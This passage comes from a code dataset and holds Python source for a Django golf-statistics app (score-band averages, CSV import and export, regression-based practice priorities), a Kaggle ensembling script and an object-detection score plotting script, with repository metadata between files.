f'{male_ob_60}'+\"回\"\n context[\"male_bunker_60\"] = f'{male_bunker_60}'+\"回\"\n context[\"male_penalty_60\"] = f'{male_penalty_60}'+\"回\"\n\n #男性70平均cxt\n if f'{male_score_70}' != \"nan\":\n context[\"male_score_70\"] = male_score_70\n context[\"male_putt_70\"] = f'{male_putt_70}'\n context[\"male_fw_70\"] = f'{male_fw_70}'+\"%\"\n context[\"male_par_on_70\"] = f'{male_par_on_70}'+\"%\"\n context[\"male_ob_70\"] = f'{male_ob_70}'+\"回\"\n context[\"male_bunker_70\"] = f'{male_bunker_70}'+\"回\"\n context[\"male_penalty_70\"] = f'{male_penalty_70}'+\"回\"\n\n #男性80平均cxt\n if f'{male_score_80}' != \"nan\":\n context[\"male_score_80\"] = male_score_80\n context[\"male_putt_80\"] = f'{male_putt_80}'\n context[\"male_fw_80\"] = f'{male_fw_80}'+\"%\"\n context[\"male_par_on_80\"] = f'{male_par_on_80}'+\"%\"\n context[\"male_ob_80\"] = f'{male_ob_80}'+\"回\"\n context[\"male_bunker_80\"] = f'{male_bunker_80}'+\"回\"\n context[\"male_penalty_80\"] = f'{male_penalty_80}'+\"回\"\n\n #男性90平均cxt\n if f'{male_score_90}' != \"nan\":\n context[\"male_score_90\"] = male_score_90\n context[\"male_putt_90\"] = f'{male_putt_90}'\n context[\"male_fw_90\"] = f'{male_fw_90}'+\"%\"\n context[\"male_par_on_90\"] = f'{male_par_on_90}'+\"%\"\n context[\"male_ob_90\"] = f'{male_ob_90}'+\"回\"\n context[\"male_bunker_90\"] = f'{male_bunker_90}'+\"回\"\n context[\"male_penalty_90\"] = f'{male_penalty_90}'+\"回\"\n \n #男性100平均cxt\n if f'{male_score_100}' != \"nan\":\n context[\"male_score_100\"] = male_score_100\n context[\"male_putt_100\"] = f'{male_putt_100}'\n context[\"male_fw_100\"] = f'{male_fw_100}'+\"%\"\n context[\"male_par_on_100\"] = f'{male_par_on_100}'+\"%\"\n context[\"male_ob_100\"] = f'{male_ob_100}'+\"回\"\n context[\"male_bunker_100\"] = f'{male_bunker_100}'+\"回\"\n context[\"male_penalty_100\"] = f'{male_penalty_100}'+\"回\"\n\n #男性110平均cxt\n if f'{male_score_110}' != \"nan\":\n context[\"male_score_110\"] = male_score_110\n context[\"male_putt_110\"] = f'{male_putt_110}'\n context[\"male_fw_110\"] = f'{male_fw_110}'+\"%\"\n context[\"male_par_on_110\"] = f'{male_par_on_110}'+\"%\"\n context[\"male_ob_110\"] = f'{male_ob_110}'+\"回\"\n context[\"male_bunker_110\"] = f'{male_bunker_110}'+\"回\"\n context[\"male_penalty_110\"] = f'{male_penalty_110}'+\"回\"\n\n #男性120平均cxt\n if f'{male_score_120}' != \"nan\":\n context[\"male_score_120\"] = male_score_120\n context[\"male_putt_120\"] = f'{male_putt_120}'\n context[\"male_fw_120\"] = f'{male_fw_120}'+\"%\"\n context[\"male_par_on_120\"] = f'{male_par_on_120}'+\"%\"\n context[\"male_ob_120\"] = f'{male_ob_120}'+\"回\"\n context[\"male_bunker_120\"] = f'{male_bunker_120}'+\"回\"\n context[\"male_penalty_120\"] = f'{male_penalty_120}'+\"回\"\n \n #女性↓\n\n if Stat.objects.filter(player__sex=\"女性\").values().exists() == True:\n\n #女性平均\n female_score_avgs = round(df_female[[\"player_id\",\"total_score\"]].groupby(\"player_id\").mean()[\"total_score\"].mean(), 1)\n female_putt_avgs = round(df_female[[\"player_id\",\"putt\"]].groupby(\"player_id\").mean()[\"putt\"].mean(), 1)\n female_fw_avgs = round(df_female[[\"player_id\",\"fw\"]].groupby(\"player_id\").mean()[\"fw\"].mean(), 1)\n female_par_on_avgs = round(df_female[[\"player_id\",\"par_on\"]].groupby(\"player_id\").mean()[\"par_on\"].mean(), 1)\n female_ob_avgs = round(df_female[[\"player_id\",\"ob\"]].groupby(\"player_id\").mean()[\"ob\"].mean(), 1)\n female_bunker_avgs = round(df_female[[\"player_id\",\"bunker\"]].groupby(\"player_id\").mean()[\"bunker\"].mean(), 1)\n female_penalty_avgs = round(df_female[[\"player_id\",\"penalty\"]].groupby(\"player_id\").mean()[\"penalty\"].mean(), 1)\n\n #女性それぞれの平均\n allfemale_score_avg = df_female[[\"player_id\",\"total_score\",\"ob\",\"penalty\",\"fw\",\"par_on\",\"putt\", \"bunker\"]].groupby(\"player_id\").mean()\n female_60 = allfemale_score_avg[allfemale_score_avg[\"total_score\"] < 70]\n female_70 = allfemale_score_avg[(allfemale_score_avg[\"total_score\"] >= 70) & (allfemale_score_avg[\"total_score\"] < 80)]\n female_80 = allfemale_score_avg[(allfemale_score_avg[\"total_score\"] >= 80) & (allfemale_score_avg[\"total_score\"] < 90)]\n female_90 = allfemale_score_avg[(allfemale_score_avg[\"total_score\"] >= 90) & (allfemale_score_avg[\"total_score\"] < 100)]\n female_100 = allfemale_score_avg[(allfemale_score_avg[\"total_score\"] >= 100) & (allfemale_score_avg[\"total_score\"] < 110)]\n female_110 = allfemale_score_avg[(allfemale_score_avg[\"total_score\"] >= 110) & (allfemale_score_avg[\"total_score\"] < 120)]\n female_120 = allfemale_score_avg[allfemale_score_avg[\"total_score\"] >= 120]\n\n #女性60平均\n female_score_60 = round(female_60.mean()[\"total_score\"], 1)\n female_putt_60 = round(female_60.mean()[\"putt\"], 1)\n female_fw_60 = round(female_60.mean()[\"fw\"], 1)\n female_par_on_60 = round(female_60.mean()[\"par_on\"], 1)\n female_ob_60 = round(female_60.mean()[\"ob\"], 1)\n female_bunker_60 = round(female_60.mean()[\"bunker\"], 1)\n female_penalty_60 = round(female_60.mean()[\"penalty\"], 1)\n\n #女性70平均\n female_score_70 = round(female_70.mean()[\"total_score\"], 1)\n female_putt_70 = round(female_70.mean()[\"putt\"], 1)\n female_fw_70 = round(female_70.mean()[\"fw\"], 1)\n female_par_on_70 = round(female_70.mean()[\"par_on\"], 1)\n female_ob_70 = round(female_70.mean()[\"ob\"], 1)\n female_bunker_70 = round(female_70.mean()[\"bunker\"], 1)\n female_penalty_70 = round(female_70.mean()[\"penalty\"], 1)\n\n #女性80平均\n female_score_80 = round(female_80.mean()[\"total_score\"], 1)\n female_putt_80 = round(female_80.mean()[\"putt\"], 1)\n female_fw_80 = round(female_80.mean()[\"fw\"], 1)\n female_par_on_80 = round(female_80.mean()[\"par_on\"], 1)\n female_ob_80 = round(female_80.mean()[\"ob\"], 1)\n female_bunker_80 = round(female_80.mean()[\"bunker\"], 1)\n female_penalty_80 = round(female_80.mean()[\"penalty\"], 1)\n \n #女性90平均\n female_score_90 = round(female_90.mean()[\"total_score\"], 1)\n female_putt_90 = round(female_90.mean()[\"putt\"], 1)\n female_fw_90 = round(female_90.mean()[\"fw\"], 1)\n female_par_on_90 = round(female_90.mean()[\"par_on\"], 1)\n female_ob_90 = round(female_90.mean()[\"ob\"], 1)\n female_bunker_90 = round(female_90.mean()[\"bunker\"], 1)\n female_penalty_90 = round(female_90.mean()[\"penalty\"], 1)\n\n #女性100平均\n female_score_100 = round(female_100.mean()[\"total_score\"], 1)\n female_putt_100 = round(female_100.mean()[\"putt\"], 1)\n female_fw_100 = round(female_100.mean()[\"fw\"], 1)\n female_par_on_100 = round(female_100.mean()[\"par_on\"], 1)\n female_ob_100 = round(female_100.mean()[\"ob\"], 1)\n female_bunker_100 = round(female_100.mean()[\"bunker\"], 1)\n female_penalty_100 = round(female_100.mean()[\"penalty\"], 1)\n\n #女性110平均\n female_score_110 = round(female_110.mean()[\"total_score\"], 1)\n female_putt_110 = round(female_110.mean()[\"putt\"], 1)\n female_fw_110 = round(female_110.mean()[\"fw\"], 1)\n female_par_on_110 = round(female_110.mean()[\"par_on\"], 1)\n female_ob_110 = round(female_110.mean()[\"ob\"], 1)\n female_bunker_110 = round(female_110.mean()[\"bunker\"], 1)\n female_penalty_110 = round(female_110.mean()[\"penalty\"], 1)\n\n #女性120平均\n female_score_120 = round(female_120.mean()[\"total_score\"], 1)\n female_putt_120 = round(female_120.mean()[\"putt\"], 1)\n female_fw_120 = round(female_120.mean()[\"fw\"], 1)\n female_par_on_120 = round(female_120.mean()[\"par_on\"], 1)\n female_ob_120 = round(female_120.mean()[\"ob\"], 1)\n female_bunker_120 = round(female_120.mean()[\"bunker\"], 1)\n female_penalty_120 = round(female_120.mean()[\"penalty\"], 1)\n\n\n #女性平均cxt\n if f'{female_score_avgs}' != \"nan\":\n context[\"female_score_avgs\"] = f'{female_score_avgs}'\n context[\"female_putt_avgs\"] = f'{female_putt_avgs}'\n context[\"female_fw_avgs\"] = f'{female_fw_avgs}'+\"%\"\n context[\"female_par_on_avgs\"] = f'{female_par_on_avgs}'+\"%\"\n context[\"female_ob_avgs\"] = f'{female_ob_avgs}'+\"回\"\n context[\"female_bunker_avgs\"] = f'{female_bunker_avgs}'+\"回\"\n context[\"female_penalty_avgs\"] = f'{female_penalty_avgs}'+\"回\"\n \n #女性60平均cxtf'{}'+\"\"\n if f'{female_score_60}' != \"nan\":\n context[\"female_score_60\"] = female_score_60\n context[\"female_putt_60\"] = f'{female_putt_60}'\n context[\"female_fw_60\"] = f'{female_fw_60}'+\"%\"\n context[\"female_par_on_60\"] = f'{female_par_on_60}'+\"%\"\n context[\"female_ob_60\"] = f'{female_ob_60}'+\"回\"\n context[\"female_bunker_60\"] = f'{female_bunker_60}'+\"回\"\n context[\"female_penalty_60\"] = f'{female_penalty_60}'+\"回\"\n\n #女性70平均cxt\n if f'{female_score_70}' != \"nan\":\n context[\"female_score_70\"] = female_score_70\n context[\"female_putt_70\"] = f'{female_putt_70}'\n context[\"female_fw_70\"] = f'{female_fw_70}'+\"%\"\n context[\"female_par_on_70\"] = f'{female_par_on_70}'+\"%\"\n context[\"female_ob_70\"] = f'{female_ob_70}'+\"回\"\n context[\"female_bunker_70\"] = f'{female_bunker_70}'+\"回\"\n context[\"female_penalty_70\"] = f'{female_penalty_70}'+\"回\"\n\n #女性80平均cxt\n if f'{female_score_80}' != \"nan\":\n context[\"female_score_80\"] = female_score_80\n context[\"female_putt_80\"] = f'{female_putt_80}'\n context[\"female_fw_80\"] = f'{female_fw_80}'+\"%\"\n context[\"female_par_on_80\"] = f'{female_par_on_80}'+\"%\"\n context[\"female_ob_80\"] = f'{female_ob_80}'+\"回\"\n context[\"female_bunker_80\"] = f'{female_bunker_80}'+\"回\"\n context[\"female_penalty_80\"] = f'{female_penalty_80}'+\"回\"\n\n #女性90平均cxt\n if f'{female_score_90}' != \"nan\":\n context[\"female_score_90\"] = female_score_90\n context[\"female_putt_90\"] = f'{female_putt_90}'\n context[\"female_fw_90\"] = f'{female_fw_90}'+\"%\"\n context[\"female_par_on_90\"] = f'{female_par_on_90}'+\"%\"\n context[\"female_ob_90\"] = f'{female_ob_90}'+\"回\"\n context[\"female_bunker_90\"] = f'{female_bunker_90}'+\"回\"\n context[\"female_penalty_90\"] = f'{female_penalty_90}'+\"回\"\n \n #女性100平均cxt\n if f'{female_score_100}' != \"nan\":\n context[\"female_score_100\"] = female_score_100\n context[\"female_putt_100\"] = f'{female_putt_100}'\n context[\"female_fw_100\"] = f'{female_fw_100}'+\"%\"\n context[\"female_par_on_100\"] = f'{female_par_on_100}'+\"%\"\n context[\"female_ob_100\"] = f'{female_ob_100}'+\"回\"\n context[\"female_bunker_100\"] = f'{female_bunker_100}'+\"回\"\n context[\"female_penalty_100\"] = f'{female_penalty_100}'+\"回\"\n\n #女性110平均cxt\n if f'{female_score_110}' != \"nan\":\n context[\"female_score_110\"] = female_score_110\n context[\"female_putt_110\"] = f'{female_putt_110}'\n context[\"female_fw_110\"] = f'{female_fw_110}'+\"%\"\n context[\"female_par_on_110\"] = f'{female_par_on_110}'+\"%\"\n context[\"female_ob_110\"] = f'{female_ob_110}'+\"回\"\n context[\"female_bunker_110\"] = f'{female_bunker_110}'+\"回\"\n context[\"female_penalty_110\"] = f'{female_penalty_110}'+\"回\"\n\n #女性120平均cxt\n if f'{female_score_120}' != \"nan\":\n context[\"female_score_120\"] = female_score_120\n context[\"female_putt_120\"] = f'{female_putt_120}'\n context[\"female_fw_120\"] = f'{female_fw_120}'+\"%\"\n context[\"female_par_on_120\"] = f'{female_par_on_120}'+\"%\"\n context[\"female_ob_120\"] = f'{female_ob_120}'+\"回\"\n context[\"female_bunker_120\"] = f'{female_bunker_120}'+\"回\"\n context[\"female_penalty_120\"] = f'{female_penalty_120}'+\"回\"\n\n\n\n return context\n\n#csvインポート\nclass CsvImport(generic.FormView):\n template_name = 'score/csv_import.html'\n success_url = reverse_lazy('score:person_list')\n form_class = CSVUploadForm\n\n def form_valid(self, form):\n file_encoding = chardet.detect(form.cleaned_data['file'].read())['encoding']\n form.cleaned_data['file'].seek(0)\n\n # Check if the detected encoding is utf-8\n if file_encoding is not None and file_encoding.lower() == 'utf-8':\n # csv.readerに渡すため、TextIOWrapperでテキストモードなファイルに変換\n form_data = io.TextIOWrapper(form.cleaned_data['file'], encoding='utf-8')\n csv_file = csv.reader(form_data)\n # 1行ずつ取り出し、作成していく\n if form_data.name.endswith('.csv'):\n successful = True # 全てのデータを登録できたかどうかのフラグ\n for line in csv_file:\n try:\n #異なるログインユーザーであれば同じplayer_numberでも登録したいので、player_numberを工夫\n #読み込もうとしているプレイヤーが既に登録されていないかチェック\n if f'[{self.request.user.id}]' != list(Person.objects.values_list('login_user', flat=True).filter(player_number=int(f'{self.request.user.id}'+\"000000\"+f'{line[1]}'))):\n person, created = Person.objects.get_or_create(player_number=int(f'{self.request.user.id}'+\"000000\"+f'{line[1]}'))\n person.login_user = self.request.user.id\n person.name =line[0]\n person.age = line[2]\n person.sex = line[3]\n person.save()\n\n stat_number_check =list(Stat.objects.values(\"stat_number\").all())\n stat_number_check = f'{stat_number_check}'\n stat_number_check = stat_number_check.replace(\"}\", \"\")\n s_check = int(f'{self.request.user.id}'+\"000000\"+f'{line[12]}')\n #読み込もうとしているスタッツが既に登録されていないかチェック\n if f': {s_check},' not in f'{stat_number_check}' and f': {s_check}]' not in f'{stat_number_check}':\n \n Stat.objects.create(\n player = Person.objects.get(player_number=int(f'{self.request.user.id}'+\"000000\"f'{line[1]}')),\n stat_number = int(f'{self.request.user.id}'+\"000000\"+f'{line[12]}'),\n date = line[4],\n total_score = line[5],\n putt = line[6],\n fw = line[7],\n par_on = line[8],\n ob = line[9],\n bunker = line[10],\n penalty = line[11]\n )\n except:\n successful = False # データ登録に失敗した場合、フラグをFalseにする\n \n if successful:\n return super().form_valid(form)\n else:\n return redirect('score:person_list')\n return super().form_valid(form)\n \n else:\n messages.add_message(self.request, messages.ERROR, \"csvファイルを選択してください\")\n return redirect('score:csv_import')\n else:\n messages.add_message(self.request, messages.ERROR, \"文字コードがUTF-8のcsvファイルを選択してください。\")\n return redirect('score:csv_import')\n\n#csvエクスポート\ndef csv_export(request):\n #csvファイル作成\n response = HttpResponse(content_type='text/csv; charset=Shift-JIS')\n filename = urllib.parse.quote((u'stats_analyze.csv').encode(\"utf8\"))\n response['Content-Disposition'] = 'attachment; filename*=UTF-8\\'\\'{}'.format(filename)\n writer = csv.writer(response)\n #列名\n header = [\"名前\", \"影響度\", \"パット\",'FWキープ','パーオン','OB',\"バンカー\",'ペナルティ', \"stats平均\",\"スコア\",\"パット数\",\"FWキープ率\",\"パーオン率\",\"OB数\",\"バンカー数\",\"ペナルティ数\"]\n writer.writerow(header)\n login_user_id = request.user.id\n\n #StatAnalyzeクラスの計算式を使い回す方法が分からなかったため再度計算\n pks = list(Person.objects.values_list('id', flat=True).filter(login_user=login_user_id).order_by(\"sex\"))\n for pk in pks:\n\n if Stat.objects.filter(player=pk).all().exists() == True:\n\n df = pd.DataFrame(Stat.objects.filter(player_id=pk).values())\n df.columns = ['id', 'player_id', 'date', \"スコア\", 'パット','FWキープ','パーオン','OB','バンカー','ペナルティ','stat_number']\n\n if len(df) > 7:\n #全stat\n z = df.drop(['id','player_id','date','stat_number'], axis=1)\n\n score_count = len(z)-1\n putt_true_count = f'{z.duplicated(\"パット\")}'.count(\"True\")\n if putt_true_count == score_count:\n z.iat[1,1] = 101\n\n fw_true_count = f'{z.duplicated(\"FWキープ\")}'.count(\"True\")\n if fw_true_count == score_count:\n z.iat[1,2] = 101\n\n par_true_count = f'{z.duplicated(\"パーオン\")}'.count(\"True\")\n if par_true_count == score_count:\n z.iat[1,3] = 101\n \n ob_true_count = f'{z.duplicated(\"OB\")}'.count(\"True\")\n if ob_true_count == score_count:\n z.iat[1,4] = 101\n\n bunker_true_count = f'{z.duplicated(\"バンカー\")}'.count(\"True\")\n if bunker_true_count == score_count:\n z.iat[1,5] = 101\n\n penalty_true_count = f'{z.duplicated(\"ペナルティ\")}'.count(\"True\")\n if penalty_true_count == score_count:\n z.iat[1,6] = 101 \n\n #statを標準化\n df_std = z.apply(lambda x: (x-x.mean())/x.std(), axis=0)\n #statのスコア以外\n x = df_std.drop(['スコア'], axis=1)\n #スコア\n y = df_std['スコア']\n\n reg = LinearRegression()\n results = reg.fit(x,y)\n coef = reg.coef_.round(4)\n n = x.shape[0]\n p = x.shape[1]\n\n y_hat = reg.predict(x)\n sse = np.sum((y - y_hat) **2, axis=0)\n sse = sse / (n - p - 1)\n s = np.linalg.inv(np.dot(x.T, x))\n std_err = np.sqrt(np.diagonal(sse * s)).round(4)\n\n t_values = (coef / std_err).round(4)\n t_values_abs = np.abs(t_values)\n t_add = t_values_abs[0] + t_values_abs[1] + t_values_abs[2] + t_values_abs[3] + t_values_abs[4] + t_values_abs[5]\n x = 100 / t_add\n t_values_abs = (x * t_values_abs).round(1)\n \n col = [\"パット\",'FWキープ','パーオン','OB',\"バンカー\",'ペナルティ',]\n practice = dict(zip(col, t_values_abs))\n \n else:\n df_score = df.sort_values(\"スコア\")\n data_count = df[\"スコア\"].count()\n \n df_patt = df.sort_values(by=[\"パット\",\"スコア\"])\n patt_count = [abs(df_patt.index.get_loc(i) - df_score.index.get_loc(i)) for i in range(data_count)]\n patt_score = sum(patt_count)\n \n df_fk = df.sort_values(by=[\"FWキープ\",\"スコア\"], ascending=[False,True])\n fk_count = [abs(df_fk.index.get_loc(i) - df_score.index.get_loc(i)) for i in range(data_count)]\n fk_score = sum(fk_count)\n \n df_po = df.sort_values(by=[\"パーオン\",\"スコア\"], ascending=[False,True])\n po_count = [abs(df_po.index.get_loc(i) - df_score.index.get_loc(i)) for i in range(data_count)]\n po_score = sum(po_count)\n \n df_OB = df.sort_values(by=[\"OB\",\"スコア\"])\n OB_count = [abs(df_OB.index.get_loc(i) - df_score.index.get_loc(i)) for i in range(data_count)]\n OB_score = sum(OB_count)\n\n df_バンカー = df.sort_values(by=[\"バンカー\",\"スコア\"])\n バンカー_count = [abs(df_バンカー.index.get_loc(i) - df_score.index.get_loc(i)) for i in range(data_count)]\n バンカー_score = sum(バンカー_count)\n \n df_pn = df.sort_values(by=[\"ペナルティ\",\"スコア\"])\n pn_count = [abs(df_pn.index.get_loc(i) - df_score.index.get_loc(i)) for i in range(data_count)]\n pn_score = sum(pn_count) \n \n calc_add = 1/(OB_score+1) + 1/(pn_score+1) + 1/(fk_score+1) + 1/(po_score+1) + 1/(patt_score+1) + 1/(バンカー_score+1)\n cf = 100 / calc_add\n\n practice = {\"パット\": round(cf / (patt_score+1),1),\n \"FWキープ\": round(cf / (fk_score+1), 1),\n \"パーオン\": round(cf / (po_score+1), 1),\n \"OB\": round(cf / (OB_score+1), 1),\n \"バンカー\": round(cf / (バンカー_score+1),1),\n \"ペナルティ\": round(cf / (pn_score+1), 1)}\n \n score_avg = Stat.objects.filter(player=pk).aggregate(Avg(\"total_score\"))\n putt_avg = Stat.objects.filter(player=pk).aggregate(Avg(\"putt\")) \n fw_avg = Stat.objects.filter(player=pk).aggregate(Avg(\"fw\")) \n par_on_avg = Stat.objects.filter(player=pk).aggregate(Avg(\"par_on\")) \n ob_avg = Stat.objects.filter(player=pk).aggregate(Avg(\"ob\"))\n bunker_avg = Stat.objects.filter(player=pk).aggregate(Avg(\"bunker\"))\n penalty_avg = Stat.objects.filter(player=pk).aggregate(Avg(\"penalty\"))\n\n blank = \"\"\n player_name = list(Person.objects.values_list(\"name\", flat=True).filter(id=pk))\n player_name = f'{player_name}'.replace(\"['\", \"\").replace(\"']\", \"\")\n\n writer.writerow([player_name,blank,practice[\"パット\"],practice[\"FWキープ\"],practice[\"パーオン\"],practice[\"OB\"],practice[\"バンカー\"],practice[\"ペナルティ\"],blank,\n round(score_avg[\"total_score__avg\"],1),\n round(putt_avg[\"putt__avg\"],1),\n round(fw_avg[\"fw__avg\"],1),\n round(par_on_avg[\"par_on__avg\"],1),\n round(ob_avg[\"ob__avg\"],1),\n round(bunker_avg[\"bunker__avg\"],1), \n round(penalty_avg[\"penalty__avg\"],1)])\n \n return response\n\n#csvフォーマット\ndef csv_format(request):\n response = HttpResponse(content_type='text/csv; charset=Shift-JIS')\n filename = urllib.parse.quote((u'score_teacher_csvフォーマット.csv').encode(\"utf8\"))\n response['Content-Disposition'] = 'attachment; filename*=UTF-8\\'\\'{}'.format(filename)\n writer = csv.writer(response)\n header = [\"プレイヤー名\",\"プレイヤーナンバー一人一つの番号をつけて下さい(重複不可)\",\"年齢\",\"性別(男性or女性)\",\"ラウンド日(例:2023-03-12)\",\"スコア\",\"パット数\",\"フェアウェイキープ率\",\"パーオン率\",\"OB数\",\"バンカー数\",\"ペナルティ数\",\"ラウンドナンバー一ラウンド一つの番号をつけて下さい(重複不可)\"]\n writer.writerow(header)\n\n return response\n\n","repo_name":"yoshiringo/ScoreTeacher","sub_path":"score/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":43773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"70921665043","text":"import pandas as pd\n\ndef ensemble():\n\n\n\n ms = ['../lr/lr_test_l1.csv', '../rf/rf_test_l1.csv', '../svm/svm_test_l1.csv', '../xgb/xgb_test_l1.csv']\n ms = ['../lr/lr_test_l1.csv', '../xgb/xgb_test_l1.csv']\n\n\n test = []\n for m in ms:\n df = pd.read_csv(m)\n ID = df['ID']\n df = df.drop('ID', axis=1)\n col = df.columns\n test.append(df.values)\n \n df = sum(test)\n df = df/2.0\n df = pd.DataFrame(df, index=ID, columns=col)\n\n df.to_csv('submission.csv', index_label='ID')\n\n \n\ndef get_level_1():\n\n ms = ['../lr/lr_test_l1.csv', '../rf/rf_test_l1.csv', '../svm/svm_test_l1.csv', '../xgb/xgb_test_l1.csv']\n test = []\n for m in ms:\n df = pd.read_csv(m)\n \n df = df.drop('id', axis=1)\n test.append(df.values)\n return test\n test = pd.concat(test, axis=1)\n return test\n\n\n test.to_csv('../../data/test_level_1.csv', index=False)\n\n\n\n\n\n ms = ['../lr/lr_train_l1.csv', '../rf/rf_train_l1.csv', '../svm/svm_train_l1.csv', '../xgb/xgb_train_l1.csv']\n train = []\n for m in ms:\n df = pd.read_csv(m)\n train.append(df)\n train = pd.concat(train, axis=1)\n train.to_csv('../../data/train_level1.csv', index=False)\n\n \n\n\n\nensembal()\n#df = get_level_1()\n","repo_name":"Harry040/kaggle_framework","sub_path":"models/ensemble/ensemble.py","file_name":"ensemble.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"17673854781","text":"from inference_tool import InfTool\n\nfrom collections import Counter\nfrom collections import defaultdict\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport numpy as np\nimport argparse\nimport cv2\nimport os\nimport glob\nimport pathlib\nimport torch.nn.functional as F\nimport torch\nimport json\n\nfrom scipy.stats import entropy\n\nfrom data.config import COCO_CLASSES\n\ndef parse_args(argv=None):\n parser = argparse.ArgumentParser(\n description='Visualisation of detections')\n parser.add_argument('--detections_dir', default=\"\", type=str,\n help='Path to the file with detection results')\n parser.add_argument('--plot_bars', default=0, type=int,\n help='Style of the visualisation')\n parser.add_argument('--habitat_comparison', default=0, type=int,\n help='Whether to draw comparion real with Habitat')\n args = parser.parse_args(argv)\n\n return args\n\nif __name__ == '__main__':\n\n args = parse_args()\n\n with open(os.path.join(args.detections_dir,\"detections.json\"), 'r', encoding='utf-8') as f:\n results = json.load(f)\n if args.habitat_comparison:\n with open(os.path.join(args.detections_dir + \"_habitat\",\"detections.json\"), 'r', encoding='utf-8') as f:\n habitat_results = json.load(f)\n\n smax_vectors = np.array(results[\"detections\"])\n\n labels = [\"background\"]+list(COCO_CLASSES)\n\n argmax = np.argmax(smax_vectors, axis=0)\n num_wins = np.zeros((len(labels), len(argmax)))\n num_wins[argmax, np.arange(len(argmax))] = 1\n num_wins = np.sum(num_wins, 1)\n num_wins_normed = num_wins / np.sum(num_wins)\n num_wins_normed[num_wins_normed == 0] = np.nan\n\n total_mean = np.mean(smax_vectors, 1)\n print(smax_vectors.shape)\n print(\"Total mean {}{}\".format(total_mean.shape, np.sum(total_mean)))\n entr = entropy(total_mean.squeeze()) / np.log(len(total_mean))\n max_class = np.argmax(total_mean) - 1\n if max_class == -1:\n final_class = \"background\"\n else:\n final_class = COCO_CLASSES[max_class]\n print(\"Class: {}\".format(final_class))\n print(\"Entropy: {}\".format(entr))\n fig = plt.figure(figsize=(20,9))\n plt.title(\"Class distribution plot for the object {}\".format(results[\"object_name\"]), pad=15, weight=\"bold\", size=25)\n plt.xlabel('Class', labelpad=15, color='#333333', size=25)\n plt.ylabel('Score', labelpad=15, color='#333333', size=25)\n plt.xticks(rotation='vertical', size=15)\n plt.margins(x=0.01)\n plt.yticks(size=15)\n plt.axhline(y=results[\"args\"][\"score_threshold\"], color='black', linestyle='--', label='Score threshold')\n no_dets = (results[\"num_frames\"] - results[\"detected_frames\"])\n no_dets_bck_wins_norm = (no_dets + num_wins[0]) / (results[\"num_frames\"] + np.sum(num_wins))\n plt.scatter([\"nodet+bkgd\"], no_dets_bck_wins_norm,\n color='m', marker='o', edgecolors='black', s=100, label=\"Norm sum of nodets and bkgd wins\")\n plt.scatter([\"no detection\"], no_dets / results[\"num_frames\"],\n color='r', marker='o', edgecolors='black', s=100, label=\"Norm number of frames without dets\")\n if args.plot_bars:\n for i in range(smax_vectors.shape[1]):\n plt.bar(labels, smax_vectors[:, i], alpha=0.1, color=\"blue\")\n plt.bar(labels, total_mean, color=\"red\", label=\"Mean\", linewidth=4)\n else:\n for i in range(smax_vectors.shape[1]):\n plt.plot(labels, smax_vectors[:, i], alpha=0.1, color=\"blue\")\n plt.plot(labels, total_mean, color=\"red\", label=\"Mean\", linewidth=4)\n\n plt.scatter(labels, num_wins_normed, color='w', marker='o', edgecolors='black', s=100, zorder=1000, label=\"Norm number of wins\")\n #plt.subplots_adjust(bottom=0.2)\n\n plt.plot([], [], ' ', label=\"Number of frames: {}\".format(results[\"num_frames\"]))\n plt.plot([], [], ' ', label=\"Frames with detections: {}\".format(results[\"detected_frames\"]))\n plt.plot([], [], ' ', label=\"Number of detections {}\".format(smax_vectors.shape[1]))\n plt.plot([], [], ' ', label=\"Max mean class: {}\".format(final_class))\n plt.plot([], [], ' ', label=\"Entropy: {0:.2f}\".format(entr))\n\n plt.legend(fontsize='large')\n if args.plot_bars:\n filename = results[\"object_name\"] + \"_class_distribution_bar.png\"\n else:\n filename = results[\"object_name\"] + \"_class_distribution_plot.png\"\n plt.tight_layout()\n plt.savefig(os.path.join(args.detections_dir, filename))\n\n distr_plot = cv2.imread(os.path.join(args.detections_dir, filename))\n frames = cv2.imread(os.path.join(args.detections_dir, results[\"object_name\"] + \"_frames.png\"))\n frames = cv2.resize(frames, (0,0), fx=distr_plot.shape[0]/frames.shape[0], fy=distr_plot.shape[0]/frames.shape[0])\n cv2.imwrite(os.path.join(args.detections_dir, filename), cv2.hconcat([distr_plot, frames]))\n\n plt.clf()\n\n plt.title(\"Class distribution boxplot for the object {}\".format(results[\"object_name\"]), pad=15, weight=\"bold\", size=25)\n plt.xlabel('Class', labelpad=15, color='#333333', size=25)\n plt.ylabel('Score', labelpad=15, color='#333333', size=25)\n plt.xticks(rotation='vertical', size=15)\n plt.margins(x=0.01)\n plt.yticks(size=15)\n plt.axhline(y=results[\"args\"][\"score_threshold\"], color='black', linestyle='--', label='Score threshold')\n plt.boxplot(smax_vectors.T, labels=labels, patch_artist=True, notch=True)\n plt.legend(fontsize='large')\n plt.tight_layout()\n plt.savefig(os.path.join(args.detections_dir, results[\"object_name\"] + \"_class_distribution_boxplot.png\"))\n\n if args.habitat_comparison:\n plt.clf()\n def draw_plot(data, offset, edge_color, fill_color):\n pos = np.arange(data.shape[1])+offset\n bp = ax.boxplot(data, positions=pos, labels=labels, widths=0.3, patch_artist=True, notch=True, showfliers=False)\n for element in ['boxes', 'whiskers', 'fliers', 'medians', 'caps']:\n plt.setp(bp[element], color=edge_color)\n for patch in bp['boxes']:\n patch.set(facecolor=fill_color)\n return bp\n\n fig, ax = plt.subplots(figsize=(20,9))\n plt.title(\"Comparison between real and habitat for the {}\".format(results[\"object_name\"]), pad=15, weight=\"bold\", size=25)\n plt.xlabel('Class', labelpad=15, color='#333333', size=25)\n plt.ylabel('Score', labelpad=15, color='#333333', size=25)\n plt.xticks(rotation='vertical', size=15)\n plt.margins(x=0.01)\n plt.yticks(size=15)\n bp_real = draw_plot(smax_vectors.T, -0.2, \"black\", \"blue\")\n plt.xticks([])\n bp_hab = draw_plot(np.array(habitat_results[\"detections\"]).T, +0.2,\"black\", \"red\")\n plt.legend([bp_real[\"boxes\"][0], bp_hab[\"boxes\"][0]], [\"Real\", \"Habitat\"], fontsize='xx-large')\n plt.xticks(ha='right')\n plt.tight_layout()\n plt.savefig(os.path.join(args.detections_dir, results[\"object_name\"] + 